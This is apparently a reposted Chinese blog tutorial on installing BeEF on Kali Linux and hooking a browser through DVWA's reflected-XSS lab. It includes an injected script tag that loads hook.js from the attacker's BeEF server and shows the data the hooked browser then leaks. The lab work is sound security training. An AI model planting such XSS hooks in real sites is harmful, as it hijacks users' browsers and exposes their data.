在kali环境下安装Beef-Xss靶场搭建

9月前作者：奈何＠_＠分类：Toy博客阅读(36) 违法举报

这篇具有很好参考价值的文章主要介绍了在kali环境下安装Beef-Xss靶场搭建。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

一、更新安装包

┌──(root㉿kali)-[/home/kali]
└─# apt-get update

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

二、安装beef-xss

┌──(root㉿kali)-[/home/kali]
└─# apt-get install beef-xss

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂，功能之多

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

3、查看用户名和登录密码

┌──(root㉿kali)-[/home/kali]
└─# cd /usr/share/beef-xss

┌──(root㉿kali)-[/usr/share/beef-xss]
└─# ls -al

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

┌──(root㉿kali)-[/usr/share/beef-xss]
└─# vim /etc/beef-xss/config.yaml

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

4、登录页面

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

5、点击 Hook me:将配置的页面导入BEEF中

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后：

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

此时BEEF中监控已经上线：

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

可获取http请求头，服务器类型，IP地址等信息

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

攻击连接意图：

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建文章来源地址https://www.toymoban.com/news/detail-690834.html

到了这里，关于在kali环境下安装Beef-Xss靶场搭建的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

Kali+docker搭建Vulfocus靶场并配置vulfocus漏洞环境

好吧，上次更新博客也不记得是几年前的事情了，来说说消失的这段时间我在干嘛。最近超级无敌忙，每天送餐从早送到晚，同时兼职某团和饿了某，现在正在给一个靓女送杯奶茶，做安服税后5千块钱的工资能干嘛？赶紧和我一起做某团骑手，少走30年弯路。难得有空，最近

2024年02月05日
浏览(47)
Kali安装Docker并简单搭建漏洞靶场vulhub

Docker 是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器或Windows 机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。还可以帮助安全人员进行靶场的搭建。在kali上，先确定

2024年02月15日
浏览(44)
Kali搭建DVWA——Web靶场

▣ 博主主站地址：微笑涛声【www.cztcms.cn】 1、DVWA简介 DVWA 是一款基于 PHP 和 MYSQL 开发的 web靶场练习平台，集成了常见的web漏洞如 sql注入 , XSS ，密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好的理解web应用安全防

2024年02月04日
浏览(35)
web靶场——xss-labs靶机平台的搭建和代码审计

目录一、web靶场-xss-labs靶机平台的搭建 1、将下载好的压缩包放置php的WWW根目录下 2、配置网站 3、启动MYSQL和Nginx 4、完成后我们就可以在浏览器输入127.0.0.1：8088进入靶场二、xss-labs靶场通关攻略第一关： 1、输入代码进行测试：源代码我们直接将参数插入标题试一试第二关

2024年02月04日
浏览(51)
【网络安全 --- xss-labs靶场通关（1-10关）】详细的xss-labs靶场通关思路及技巧讲解，让你对xss漏洞的理解更深刻

靶场安装请参考以下博客，既详细有提供工具：【网络安全 --- xss-labs靶场】xss-labs靶场安装详细教程，让你巩固对xss漏洞的理解及绕过技巧和方法（提供资源）-CSDN博客【网络安全 --- xss-labs通关】xss-labs靶场通关，让你巩固对xss漏洞的理解及绕过技巧和方法（提供资源） h

2024年02月08日
浏览(46)
Kali Linux搭建DVWA漏洞靶场（全过程）

1、搭建好kali Linux虚拟机，可以看我前面发布的文章 2、有DVWA-master压缩包，可以看我前面的文章，里面含有DVWA-master压缩包目录一、开启Apache、mysql服务 1.1 下载Apache2文件 1.2 开启Apache2服务 1.3 开启mysql服务 1.4 验证Apache2服务是否成功开启二、解压并安装DVWA环境 2.1 压缩

2024年02月11日
浏览(36)
解决kali beef启动失败解问题

只限于出现这个提示的时候使用卸载 ruby apt remove ruby 卸载 beef apt remove beef-xss 重新安装ruby apt-get install ruby apt-get install ruby-dev libpcap-dev gem install eventmachine 重新安装beef apt-get install beef-xss 弄完以上步骤如果还是不行就重启kali再试试

2024年01月17日
浏览(42)
XSS攻击：利用Beef劫持被攻击者客户端浏览器

实验目的：了解什么是XSS；了解XSS攻击实施，理解防御XSS攻击的方法系统环境：Kali Linux 2、Windows Server 网络环境：交换网络结构实验工具： Beef；AWVS(Acunetix Web Vulnarability Scanner) 实验步骤：实验环境搭建。角色：留言簿网站。存在XSS漏洞；（IIS或Apache、guestbook搭建）攻击者

2024年02月03日
浏览(48)
[网络安全]XSS之Cookie外带攻击姿势及例题详析（基于DVWA靶场）

本文仅分享XSS攻击知识，不承担任何法律责任。本文涉及的软件等请读者自行安装，本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS（跨站脚本攻击）漏洞进行的攻击，攻击者通过在 XSS 攻击中注入恶意脚本，从而窃取用户的 Cookie 信息。在使用XSS语

2024年02月08日
浏览(51)
网络安全：Kali Linux 进行SQL注入与XSS漏洞利用

目录一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化（1）主机表1 主机系统版本 IP 备注 Kali Linux 2022.4 192.168.204.154（动态

2024年04月26日
浏览(37)